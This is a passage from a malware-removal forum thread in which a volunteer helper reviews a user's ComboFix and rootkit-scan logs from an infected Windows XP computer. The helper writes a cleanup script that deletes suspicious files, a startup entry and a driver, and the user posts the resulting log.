S3 s1018bus;Sony Ericsson Device 1018 driver (WDM);e:\windows\system32\drivers\s1018bus.sys [01/04/2010 18:33 86824]
S3 s1018mdfl;Sony Ericsson Device 1018 USB WMC Modem Filter;e:\windows\system32\drivers\s1018mdfl.sys [02/04/2010 11:00 15016]
S3 s1018mdm;Sony Ericsson Device 1018 USB WMC Modem Driver;e:\windows\system32\drivers\s1018mdm.sys [02/04/2010 11:00 114728]
S3 s1018mgmt;Sony Ericsson Device 1018 USB WMC Device Management Drivers (WDM);e:\windows\system32\drivers\s1018mgmt.sys [02/04/2010 11:00 106208]
S3 s1018nd5;Sony Ericsson Device 1018 USB Ethernet Emulation (NDIS);e:\windows\system32\drivers\s1018nd5.sys [01/04/2010 18:33 26024]
S3 s1018obex;Sony Ericsson Device 1018 USB WMC OBEX Interface;e:\windows\system32\drivers\s1018obex.sys [02/04/2010 11:00 104744]
S3 s1018unic;Sony Ericsson Device 1018 USB Ethernet Emulation (WDM);e:\windows\system32\drivers\s1018unic.sys [01/04/2010 18:33 109864]
S4 sptd;sptd;e:\windows\system32\drivers\sptd.sys [02/02/2010 01:58 691696]

--- Other Services/Drivers In Memory ---

*Deregistered* - PCTSDInjDriver32
*Deregistered* - sdAuxService
*Deregistered* - sdCoreService

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
bdx REG_MULTI_SZ scan
.
.
------- Supplementary Scan -------
.
IE: Convert link target to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
FF - ProfilePath - e:\documents and settings\Mike\Application Data\Mozilla\Firefox\Profiles\99m84v2t.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.co.uk/
FF - plugin: e:\program files\DivX\DivX Plus Web Player\npdivx32.dll
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - e:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

---- FIREFOX POLICIES ----
FF - user.js: network.cookie.cookieBehavior - 0
FF - user.js: privacy.clearOnShutdown.cookies - false
FF - user.js: security.warn_viewing_mixed - false
FF - user.js: security.warn_viewing_mixed.show_once - false
FF - user.js: security.warn_submit_insecure - false
FF - user.js: security.warn_submit_insecure.show_once - false
e:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.use_native_colors", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.lu", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.nu", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.nz", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbaam7a8h", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgberp4a5d4ar", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--p1ai", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbayh7gpa", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.tel", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.auth.force-generic-ntlm", false);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.proxy.type", 5);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.buffer.cache.count", 24);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.buffer.cache.size", 4096);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("dom.ipc.plugins.timeoutSecs", 45);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("svg.smil.enabled", false);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("accelerometer.enabled", true);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.allow_unrestricted_renego_everywhere__temporarily_available_pref", true);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.renego_unrestricted_hosts", "");
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.treat_unsafe_negotiation_as_broken", false);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.require_safe_negotiation", false);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.name", "chrome://browser/locale/browser.properties");
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.description", "chrome://browser/locale/browser.properties");
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("plugins.update.notifyUser", false);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.nptest.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npswf32.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npctrl.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npqtplugin.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled", false);
.
- - - - ORPHANS REMOVED - - - -

ShellExecuteHooks-{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - e:\program files\SUPERAntiSpyware\SASSEH.DLL
MSConfigStartUp-Acrobat Assistant 7 - e:\program files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe
MSConfigStartUp-QuickTime Task - e:\program files\QuickTime\QTTask.exe
AddRemove-Adobe SVG Viewer - e:\program files\Common Files\Adobe\SVG Viewer 3.0\Uninstall\Winstall.exe
AddRemove-Broadcom 802.11b Network Adapter - e:\program files\Dell\Dell Wireless WLAN Card\bcmwlu00.exe
AddRemove-CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2BFA&SUBSYS_14F100C3 - e:\program files\CONEXANT\CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2BFA&SUBSYS_14F100C3\HXFSETUP.EXE
AddRemove-{D8CE69B0-9274-4b8c-BA49-0FF6A20A3C65} - e:\program files\SAMSUNG\SYMBIAN USB Download Driver\Uninstall.exe



**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-08-07 23:49
Windows 5.1.2600 Service Pack 2 NTFS

detected NTDLL code modification:
ZwClose, ZwOpenFile

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet005\Services\MEMSWEEP2]
"ImagePath"="\??\e:\windows\system32\8C.tmp"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(844)
e:\windows\system32\guard32.dll
e:\program files\SUPERAntiSpyware\SASWINLO.DLL
e:\windows\system32\WININET.dll
e:\windows\System32\BCMLogon.dll

- - - - - - - > 'lsass.exe'(900)
e:\windows\system32\guard32.dll
e:\program files\Common Files\PC Tools\Lsp\PCTLsp.dll
.
Completion time: 2010-08-07 23:51:50
ComboFix-quarantined-files.txt 2010-08-07 22:51
ComboFix2.txt 2010-07-26 13:37

Pre-Run: 32,983,543,808 bytes free
Post-Run: 33,033,322,496 bytes free

Current=5 Default=5 Failed=3 LastKnownGood=6 Sets=1,2,3,4,5,6
- - End Of File - - 483A04C3C839B5ABB5CF94103981E961
[/codebox]


All the best

Mike

Attached Files



#7 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:09:39 PM

Posted 07 August 2010 - 06:36 PM

Okay, some signs of malware. Please rerun Combofix as below.

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

3. Open notepad and copy/paste the text in the box below into it:

QUOTE
http://www.bleepingcomputer.com/forums/ind...view=getnewpost

Collect::
e:\documents and settings\Mike\Start Menu\Programs\Startup\sisytj32.exe

File::
e:\documents and settings\Erin\Local Settings\Application Data\Szuyoc.dat
e:\documents and settings\Erin\Local Settings\Application Data\Oyavogikewejog.bin
e:\windows\Oyavogikewejog.bin
e:\windows\Szuyoc.dat
e:\windows\system32\config\systemprofile\Application Data\ofubwi.dat
e:\documents and settings\Mike\Application Data\ofubwi.dat
e:\windows\pss\sisytj32.exe
e:\docume~1\Mike\LOCALS~1\Temp\aswArKrn.sys

Registry::
[-HKLM\~\startupfolder\E:^Documents and Settings^Mike^Start Menu^Programs^Startup^sisytj32.exe]

Driver::
aswArKrn


Save this as CFScript.txt, in the same location as Comfix.exe (called ComboFix.exe in the below graphic)




Refering to the picture above, drag CFScript into ComboFix.exe

When finished, it shall produce a log for you at C:\ComboFix.txt which I will require in your next reply.
Posted Image
m0le is a proud member of UNITE

#8 mikethecow

mikethecow
  • Topic Starter

  • Members
  • 28 posts
  • OFFLINE
  •  
  • Local time:10:39 PM

Posted 07 August 2010 - 07:28 PM

Hi M0le

QUOTE
ComboFix 10-08-07.01 - Mike 08/08/2010 0:49.6.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.2.1252.44.1033.18.1015.716 [GMT 1:00]
Running from: e:\documents and settings\Mike\Desktop\ComFix.exe
Command switches used :: e:\documents and settings\Mike\Desktop\CFScript.txt
FW: COMODO Firewall *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}

FILE ::
"e:\docume~1\Mike\LOCALS~1\Temp\aswArKrn.sys"
"e:\documents and settings\Erin\Local Settings\Application Data\Oyavogikewejog.bin"
"e:\documents and settings\Erin\Local Settings\Application Data\Szuyoc.dat"
"e:\documents and settings\Mike\Application Data\ofubwi.dat"
"e:\windows\Oyavogikewejog.bin"
"e:\windows\pss\sisytj32.exe"
"e:\windows\system32\config\systemprofile\Application Data\ofubwi.dat"
"e:\windows\Szuyoc.dat"
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

e:\documents and settings\Erin\Local Settings\Application Data\Oyavogikewejog.bin
e:\documents and settings\Erin\Local Settings\Application Data\Szuyoc.dat
e:\documents and settings\Mike\Application Data\ofubwi.dat
e:\program files\Microsoft\DesktopLayer.exe
e:\windows\Oyavogikewejog.bin
e:\windows\system32\config\systemprofile\Application Data\ofubwi.dat
e:\windows\Szuyoc.dat

.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.

-------\Legacy_ASWARKRN
-------\Service_aswArKrn


((((((((((((((((((((((((( Files Created from 2010-07-08 to 2010-08-08 )))))))))))))))))))))))))))))))
.

2010-08-01 11:06 . 2010-08-01 11:07 -------- d-----w- e:\documents and settings\Admin\Application Data\PSpad
2010-08-01 10:34 . 2010-08-01 10:34 -------- d--h--w- e:\windows\PIF
2010-07-30 06:46 . 2010-08-07 23:01 46080 ----a-w- e:\windows\ExplorerSrv.exe
2010-07-29 21:11 . 2010-07-29 21:11 -------- d-----w- e:\documents and settings\Admin\Application Data\Malwarebytes
2010-07-29 20:38 . 2010-07-29 20:38 -------- d-----w- e:\documents and settings\Admin\Application Data\Systweak
2010-07-29 09:11 . 2010-02-05 08:17 233136 ----a-w- e:\windows\system32\drivers\pctgntdi.sys
2010-07-29 09:10 . 2010-03-29 09:06 218592 ----a-w- e:\windows\system32\drivers\PCTCore.sys
2010-07-29 09:10 . 2009-11-23 12:54 88040 ----a-w- e:\windows\system32\drivers\PCTAppEvent.sys
2010-07-29 09:09 . 2010-08-07 23:05 -------- d-----w- e:\program files\Common Files\PC Tools
2010-07-29 09:03 . 2010-07-29 21:37 -------- d-----w- e:\documents and settings\Admin\Microsoft
2010-07-28 20:16 . 2010-07-28 20:18 63488 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\SD10006.dll
2010-07-28 20:16 . 2010-07-28 20:18 117760 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\UIREPAIR.DLL
2010-07-28 20:16 . 2010-07-28 20:16 52224 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\SD10005.dll
2010-07-28 20:12 . 2010-07-28 20:12 -------- d-----w- E:\VritualRoot
2010-07-28 20:11 . 2010-07-28 20:12 -------- d-----w- e:\documents and settings\All Users\Application Data\COMODO
2010-07-28 20:09 . 2010-07-28 20:09 -------- d-----w- e:\program files\COMODO
2010-07-28 20:02 . 2010-07-28 20:08 -------- d-----w- e:\documents and settings\All Users\Application Data\Comodo Downloader
2010-07-28 14:35 . 2010-07-28 14:35 -------- d-----w- e:\program files\ESET
2010-07-22 11:16 . 2010-07-22 11:16 -------- d-----w- E:\modules
2010-07-21 20:53 . 2010-07-28 17:25 -------- d-----w- e:\program files\riva
2010-07-21 20:52 . 2010-08-08 00:13 -------- d-----w- e:\program files\Microsoft

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-08-07 22:33 . 2010-06-15 10:25 -------- d---a-w- e:\documents and settings\All Users\Application Data\TEMP
2010-08-07 12:58 . 2010-02-06 23:45 -------- d-----w- e:\documents and settings\Mike\Application Data\vlc
2010-08-01 10:53 . 2010-02-01 22:06 23928 ----a-w- e:\documents and settings\Admin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-07-31 10:57 . 2010-02-02 09:06 -------- d-----w- e:\program files\Common Files\Adobe
2010-07-29 21:11 . 2010-05-04 20:03 -------- d-----w- e:\program files\Malwarebytes' Anti-Malware
2010-07-29 09:59 . 2010-07-29 10:06 6144 ------w- e:\windows\system32\2.tmp
2010-07-28 20:49 . 2010-05-04 20:10 -------- d-----w- e:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2010-07-28 17:24 . 2010-02-01 23:35 -------- d-----w- e:\program files\Opera
2010-07-28 15:18 . 2010-02-02 11:34 -------- d-----w- e:\program files\ZipGenius 6
2010-07-28 15:17 . 2010-06-10 12:27 -------- d-----w- e:\program files\SUPERAntiSpyware
2010-07-28 15:14 . 2010-02-01 23:55 -------- d-----w- e:\program files\QuickTime
2010-07-28 15:14 . 2010-02-02 10:19 -------- d-----w- e:\program files\PSPad editor
2010-07-28 15:14 . 2010-04-20 10:17 -------- d-----w- e:\program files\PC Connectivity Solution
2010-07-28 15:12 . 2010-05-13 09:34 -------- d-----w- e:\program files\Duplicate Cleaner
2010-07-28 15:11 . 2010-02-02 00:58 -------- d-----w- e:\program files\DAEMON Tools Lite
2010-07-28 15:11 . 2010-02-27 07:31 -------- d-----w- e:\program files\Common Files\DivX Shared
2010-07-28 15:09 . 2010-06-11 16:33 -------- d-----w- e:\program files\CCleaner
2010-07-28 15:09 . 2010-04-29 16:29 -------- d-----w- e:\program files\Audacity
2010-07-28 15:00 . 2010-06-13 16:14 -------- d-----w- e:\program files\a-squared HiJackFree
2010-07-28 14:59 . 2010-02-02 11:34 -------- d-----w- e:\program files\7-Zip
2010-07-26 09:40 . 2010-02-01 23:17 -------- d-----w- e:\program files\BitDefender
2010-07-26 09:33 . 2010-02-01 23:25 81984 ----a-w- e:\windows\system32\bdod.bin
2010-07-24 12:56 . 2010-02-11 13:14 -------- d-----w- e:\documents and settings\Mike\Application Data\uTorrent
2010-07-24 11:27 . 2010-02-02 10:57 -------- d-----w- e:\documents and settings\Mike\Application Data\FileZilla
2010-07-23 20:37 . 2010-06-13 16:14 -------- d-----w- e:\program files\a-squared Free
2010-07-23 17:37 . 2010-03-19 12:17 -------- d-----w- e:\documents and settings\Mike\Application Data\Aczy
2010-07-23 16:23 . 2010-04-25 07:45 -------- d-----w- e:\documents and settings\Mike\Application Data\Nuunn
2010-07-11 09:22 . 2010-05-29 15:34 -------- d-----w- e:\documents and settings\Erin\Application Data\vlc
2010-07-09 20:48 . 2010-04-06 23:07 -------- d-----w- e:\documents and settings\Erin\Application Data\uTorrent
2010-07-05 20:05 . 2010-02-02 09:36 23928 ----a-w- e:\documents and settings\Mike\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-06-26 13:39 . 2010-06-26 13:39 -------- d-----w- e:\documents and settings\Erin\Application Data\Systweak
2010-06-15 16:48 . 2010-06-15 16:44 43488992 ----a-w- e:\documents and settings\All Users\Application Data\Systweak\Advanced System Protector\Antispyware_Setup_6_15_2010.exe
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\documents and settings\Mike\Application Data\Systweak
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\documents and settings\All Users\Application Data\Systweak
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\program files\Systweak
2010-06-15 11:43 . 2010-06-09 09:34 -------- d-----w- e:\program files\Common Files\Little Registry Cleaner
2010-06-15 11:43 . 2010-06-09 09:32 -------- d-----w- e:\program files\Little Registry Cleaner
2010-06-15 11:42 . 2010-06-15 10:59 -------- d-----w- e:\program files\Win 32.Trojan Downloader.Murlo Removal Tool
2010-06-15 09:29 . 2010-06-15 09:29 -------- dc-h--w- e:\documents and settings\All Users\Application Data\{74D08EB8-01D1-4BAE-91E3-F30C1B031AC6}
2010-06-13 16:13 . 2010-06-13 16:13 388096 ----a-r- e:\documents and settings\Mike\Application Data\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2010-06-13 16:13 . 2010-06-13 16:13 -------- d-----w- e:\program files\Trend Micro
2010-06-12 14:36 . 2010-06-12 14:36 -------- d-----w- e:\program files\Sophos
2010-06-12 01:31 . 2010-06-11 22:52 -------- d-----w- e:\program files\Windows Live Safety Center
2010-06-10 12:28 . 2010-06-10 12:28 -------- d-----w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com
2010-06-10 12:28 . 2010-06-10 12:28 -------- d-----w- e:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2010-06-10 11:03 . 2010-02-01 19:40 77423 ----a-w- e:\windows\pchealth\helpctr\OfflineCache\index.dat
2010-06-04 10:55 . 2010-06-04 10:55 229312 ----a-w- e:\windows\system32\drivers\cmdGuard.sys
2010-06-01 18:00 . 2010-06-01 18:00 278288 ----a-w- e:\windows\system32\guard32.dll
2010-06-01 18:00 . 2010-06-01 18:00 87824 ----a-w- e:\windows\system32\drivers\inspect.sys
2010-06-01 18:00 . 2010-06-01 18:00 25240 ----a-w- e:\windows\system32\drivers\cmdhlp.sys
2010-06-01 18:00 . 2010-06-01 18:00 15464 ----a-w- e:\windows\system32\drivers\cmderd.sys
2010-06-01 15:47 . 2010-04-08 08:19 19616 ----a-w- e:\documents and settings\Erin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
.

((((((((((((((((((((((((((((( SnapShot@2010-07-26_13.35.37 )))))))))))))))))))))))))))))))))))))))))
.
- 2010-02-01 20:18 . 2010-07-24 07:54 32768 e:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
+ 2010-02-01 20:18 . 2010-07-28 20:11 32768 e:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
+ 2010-02-01 20:18 . 2010-07-28 20:11 32768 e:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
- 2010-02-01 20:18 . 2010-07-24 07:54 32768 e:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Distiller.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Distiller.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat_Standard.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat_Standard.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 65536 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\PM_Designer.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 65536 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\PM_Designer.exe
+ 2009-12-21 19:09 . 2009-12-21 19:09 16832 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\ViewerPS.dll
+ 2009-12-22 00:57 . 2009-12-22 00:57 35760 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\reader_sl.exe
+ 2009-12-21 19:02 . 2009-12-21 19:02 79280 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\PDFPrevHndlr.dll
+ 2009-12-21 22:21 . 2009-12-21 22:21 99776 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\eula.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 70584 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\adobeextractfiles.dll
+ 2009-12-21 22:37 . 2009-12-21 22:37 27048 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrotextextractor.exe
+ 2009-12-21 17:39 . 2009-12-21 17:39 15288 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32Info.exe
+ 2009-12-21 17:27 . 2009-12-21 17:27 75200 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acroiehelpershim.dll
+ 2009-12-21 17:27 . 2009-12-21 17:27 61888 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroIEHelper.dll
- 2010-02-02 09:13 . 2010-02-02 09:13 7278 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_ELEMENTS_DT.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 7278 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_ELEMENTS_DT.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 326056 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\readerupdater.exe
+ 2009-12-21 17:35 . 2009-12-21 17:35 378264 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\pdfshell.dll
+ 2009-12-21 19:05 . 2009-12-21 19:05 116168 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\PDFPrevHndlrShim.exe
+ 2009-12-21 17:34 . 2009-12-21 17:34 103864 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\nppdf32.dll
+ 2009-11-09 18:18 . 2009-11-09 18:18 684032 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\JP2KLib.dll
+ 2009-12-21 19:02 . 2009-12-21 19:02 542168 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AdobeCollabSync.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 948672 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\adobearm.exe
+ 2009-12-21 17:43 . 2009-12-21 17:43 120240 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRdIF.dll
+ 2009-12-22 00:57 . 2009-12-22 00:57 349616 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32.exe
+ 2009-12-21 17:15 . 2009-12-21 17:15 660912 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroPDF.dll
+ 2009-12-21 18:32 . 2009-12-21 18:32 280024 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrobroker.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 326056 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrobatupdater.exe
+ 2009-12-21 18:15 . 2009-12-21 18:15 251296 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\a3dutility.exe
+ 2004-06-01 09:36 . 2004-06-01 09:36 214512 e:\windows\Installer\$PatchCache$\Managed\68AB67CA330100007706000000000020\7.0.0\icudt26l.dat
+ 2010-06-20 08:01 . 2010-06-20 08:01 8040960 e:\windows\Installer\90f09a.msp
+ 2010-07-31 10:58 . 2010-07-31 10:58 3940352 e:\windows\Installer\90f099.msi
+ 2010-07-28 16:26 . 2010-07-28 16:26 2647552 e:\windows\Installer\8f997b.msi
+ 2010-07-28 20:10 . 2010-07-28 20:10 3648000 e:\windows\Installer\571b0.msi
+ 2009-12-21 17:29 . 2009-12-21 17:29 2409880 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\rt3d.dll
+ 2009-12-21 18:00 . 2009-12-21 18:00 1298996 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\JSByteCodeWin.bin
+ 2009-12-21 22:31 . 2009-12-21 22:31 5713920 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AGM.dll
+ 2010-04-04 06:54 . 2010-04-04 06:54 11850240 e:\windows\Installer\90f09b.msp
+ 2009-12-21 22:21 . 2009-12-21 22:21 20436408 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"COMODO Internet Security"="e:\program files\COMODO\COMODO Internet Security\cfp.exe" [2010-06-01 2039240]
"Adobe Reader Speed Launcher"="e:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-06-20 35760]
"Adobe ARM"="e:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-06-09 976832]
"Advanced System Protector"="e:\program files\Systweak\Advanced System Protector\ASP.exe" [2009-11-03 16347368]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="e:\windows\system32\CTFMON.EXE" [2004-08-04 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- e:\program files\SUPERAntiSpyware\SASWINLO.DLL

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=e:\windows\system32\guard32.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0sasnative32

[HKLM\~\startupfolder\E:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Acrobat Speed Launcher.lnk]
path=e:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Acrobat Speed Launcher.lnk
backup=e:\windows\pss\Adobe Acrobat Speed Launcher.lnkCommon Startup

[HKLM\~\startupfolder\E:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Gamma.lnk]
path=e:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Gamma.lnk
backup=e:\windows\pss\Adobe Gamma.lnkCommon Startup

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KernelFaultCheck]
e:\windows\system32\dumprep 0 -k [X]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Advanced System Protector]
2009-11-03 18:35 16347368 ----a-w- e:\program files\Systweak\Advanced System Protector\ASP.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AutoStartNPSAgent]
2009-08-14 14:48 106904 ----a-w- e:\program files\Samsung\Samsung New PC Studio\NPSAgent.exe

